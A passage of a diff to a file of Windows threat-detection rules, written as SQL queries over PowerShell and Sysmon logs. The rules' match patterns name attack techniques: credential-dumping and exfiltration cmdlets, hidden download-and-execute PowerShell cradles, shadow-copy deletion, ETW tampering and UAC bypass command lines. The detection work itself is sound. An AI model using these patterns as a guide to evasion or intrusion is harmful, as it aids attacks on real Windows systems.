Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "status": "experimental", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_nishang_malicious_commandlets.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Live Memory Dump Using Powershell", - "id": "cd185561-4760-45d6-a63e-a51325112cae", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "author": "Max Altgelt (Nextron Systems)", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.t1003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Diagnostics" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-StorageDiagnosticInfo%' ESCAPE '\\' AND ScriptBlockText LIKE '%-IncludeLiveDump%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "WMImplant Hack Tool", - "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", "status": "test", - "description": "Detects parameters used by WMImplant", - "author": "NVISO", - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "falsepositives": [ - "Administrative scripts that use the same keywords." - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" - ], - "filename": "posh_ps_wmimplant.yml" - }, - { - "title": "Disable-WindowsOptionalFeature Command PowerShell", - "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", - "status": "experimental", - "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_ps_disable_windows_optional_feature.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "status": "experimental", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.execution", + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE 